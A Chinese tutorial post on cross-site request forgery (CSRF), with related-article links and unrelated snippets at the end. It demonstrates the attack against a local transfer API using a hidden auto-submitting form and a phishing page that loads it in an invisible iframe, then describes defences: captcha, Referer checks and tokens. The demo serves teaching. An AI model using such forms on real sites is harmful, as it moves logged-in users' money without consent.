跨站请求伪造(Cross-site request forgery)是一种冒充受信任用户,向服务器发送非预期请求的攻击方式。

攻击的前提是: 用户已经登录过某网站。

攻击者通过一些诱惑性的标题,诱惑用户点击,结果被“钓鱼”,造成一些恶劣的后果,如金钱丢失等。

代码参考:https://github.com/lyraLe/XSS

示例:

如果在本地(127.0.0.1)3000端口,有个用户登录转账网站。通过抓包等分析出转账接口需要传递用户名和金额。

这个时候可以通过在任何一个网站中嵌入下面的代码。

    <form name="fished" method="post" action="http://127.0.0.1:3000/api/transfer">
<input value="zfpx" name="target" />
<input value="100" name="balance" />
</form>

⚠️: localhost 和 127.0.0.1不是一回事。而且表态提交不存在跨域问题。域名相同,端口不同时,共享cookie。

然后在控制台中输入

document.fished.submit()

则会直接实现转账成功。

因为上面的方式会出现页面跳转到结果的现象。所以,一般钓鱼网站会将一个表单提交的iframe嵌入到一个钓鱼网站中。

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>钓鱼网站</title>
</head>
<body>
<h2>游戏礼包大放送,查看有哪些内容</h2>
<h3>该网站由fishServer启动,访问的端口是3001</h3>
<p>
这是一个钓鱼网站。顾名思义,就是这个网站上可以钓鱼,钓鱼就需要鱼饵,鱼饵就是被钓的人<br/>
感兴趣的图片或者标题和内容。比如美女图片~~~,<br/>
钓鱼网站的危险藏在水下。也就是网站内部隐藏的嵌入网站等。
</p>
<iframe style="display: none" src="./bad.html"></iframe>
<script src="/node_modules/jquery/dist/jquery.js"></script>
</body>
</html>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>恶意网站</title>
</head>
<body>
<form name="fished" method="post" action="http://127.0.0.1:3000/api/transfer">
<input value="zfpx" name="target" />
<input value="100" name="balance" />
</form>
<script>
document.fished.submit();
</script>
</body>
</html>

⚠️: 如果用户登录过本地的网站。在嵌入表单提交的第三方网站本质上拿不到cookie,在提交的时候会自动携带cookie。

如何避免上面的情况发生?

1. 验证码(可通过svg-captcha模拟)--登录后操作某些功能要求输入验证码

该方法用于减少并发量比较多,如12306(登录前就输入验证码)。用于避免CSRF攻击的化,用户体验不好。

实现方式:

钓鱼网站获取不到验证码。只有登录用户看得到。

2. 通过识别来源(请求头中的Referer)--如果Referer和接口的域名端口等不一致,说明被攻击

该方法不靠谱,因为可以通过node等方法伪造请求。

实现方式:

在后端接口接受请求的地方判断req.referer.includes('http://localhost:3000')。括号内是当前的域名和接口。

3. token -- 前后端约定一个令牌

类似验证码。但是不需要用户输入。他通过(cookie+标志)或者其他规则来生成一个token。

实现方法:

前端通过发送token,后端验证token.

CSRF(跨站请求伪造)的更多相关文章

  1. python CSRF跨站请求伪造

    python CSRF跨站请求伪造 <!DOCTYPE html> <html lang="en"> <head> <meta chars ...

  2. Django之CSRF跨站请求伪造(老掉牙的钓鱼网站模拟)

    首先这是一个测试的代码 请先在setting页面进行下面操作 注释完成后,开始模拟钓鱼网站的跨站请求伪造操作: 前端代码: <!DOCTYPE html> <html lang=&q ...

  3. ajax向Django前后端提交请求和CSRF跨站请求伪造

    1.ajax登录示例 urls.py from django.conf.urls import url from django.contrib import admin from app01 impo ...

  4. python 全栈开发,Day87(ajax登录示例,CSRF跨站请求伪造,Django的中间件,自定义分页)

    一.ajax登录示例 新建项目login_ajax 修改urls.py,增加路径 from app01 import views urlpatterns = [ path('admin/', admi ...

  5. 第三百一十五节,Django框架,CSRF跨站请求伪造

    第三百一十五节,Django框架,CSRF跨站请求伪造  全局CSRF 如果要启用防止CSRF跨站请求伪造,就需要在中间件开启CSRF #中间件 MIDDLEWARE = [ 'django.midd ...

  6. Django中的CSRF(跨站请求伪造)

    Django中的CSRF(跨站请求伪造) Django CSRF  什么是CSFR 即跨站请求伪装,就是通常所说的钓鱼网站. 钓鱼网站的页面和正经网站的页面对浏览器来说有什么区别? (页面是怎么来的? ...

  7. Django框架 之 基于Ajax中csrf跨站请求伪造

    Django框架 之 基于Ajax中csrf跨站请求伪造 ajax中csrf跨站请求伪造 方式一 1 2 3 $.ajaxSetup({     data: {csrfmiddlewaretoken: ...

  8. 十三 Django框架,CSRF跨站请求伪造

     全局CSRF 如果要启用防止CSRF跨站请求伪造,就需要在中间件开启CSRF #中间件 MIDDLEWARE = [ 'django.middleware.security.SecurityMidd ...

  9. Web框架之Django_09 重要组件(Django中间件、csrf跨站请求伪造)

    摘要 Django中间件 csrf跨站请求伪造 一.Django中间件: 什么是中间件? 官方的说法:中间件是一个用来处理Django的请求和响应的框架级别的钩子.它是一个轻量.低级别的插件系统,用于 ...

  10. django上课笔记3-ORM补充-CSRF (跨站请求伪造)

    一.ORM补充 ORM操作三大难点: 正向操作反向操作连表 其它基本操作(包含F Q extra) 性能相关的操作 class UserInfo(models.Model): uid = models ...

随机推荐

  1. 剑指offer1: 组类型——二维数组中的查找(给定一个数字,查找是否在该数组中)

    1. 思路: 缩小范围 2. 方法: (1)要查找的数字等于数组中的数字,结束查找过程: (2)要查找的数字小于数组中的数字,去除该数字右边的数字,在剩下的数字里查找: (3)要查找的数字大于数组中的 ...

  2. [python]近日 用3种库 实现简单的窗口 的回顾~

    最近任务:利用python 实现以下4个窗口弹窗. 信息提示框 文本输入框(需在窗口消失后,返回 用户输入的值) 文件选择(需在窗口消失后, 返回 用户选择的文件名的全路径) 文件夹选择(需在窗口消失 ...

  3. hdu 6045 多校签到题目

    http://acm.hdu.edu.cn/showproblem.php?pid=6045 题解:遍历一遍,求出两个人答案中相同的个数,用wa表示.然后我从大的数入手,当wa的数都尽可能在两个人答案 ...

  4. mac 下 vscode配置SFTP连接

    VScode中使用SFTP插件连接远程服务器进行文件修改 下载SFTP插件后,使用Ctrl+Shift+P.输入SFTP,选择第一个将会生成简短的默认配置文件 然后把sftp.json文件内内容换成以 ...

  5. MVC授权不通过之后不执行任何自定义ActionFilter

    如下一个Action [Authorize] [F1]//自定义过滤器,继承自ActionFilter public ActionResult Index() { return View(); } 如 ...

  6. 【php设计模式】责任链模式

    责任链模式为请求创建了一个接收者对象的链.这种模式给予请求的类型,对请求的发送者和接收者进行解耦.这种类型的设计模式属于行为型模式. 在这种模式中,通常每个接收者都包含对另一个接收者的引用.如果一个对 ...

  7. jboss 反序列化 getshell

    获取信息 上传jsp 小马 小马成功 上传大马,大马也成功

  8. python监控CPU/内存/磁盘,超过指定百分比,发送邮件

    #!/usr/bin/python #coding:utf-8 #导入psutil模块 import psutil import yagmail def mail(subject,contents): ...

  9. uni-app中nvue (weex) 注意事项

    前言 uni-app 是 DCloud 出品的新一代跨端框架,可以说是目前跨端数最多的框架之一了,目前支持发布到:App(Android/iOS).H5.小程序(微信小程序/支付宝小程序/百度小程序/ ...

  10. DbHelper简单的使用

    using System; using System.Windows.Forms; using System.Data.SqlClient; namespace WindowsFormsApp3 { ...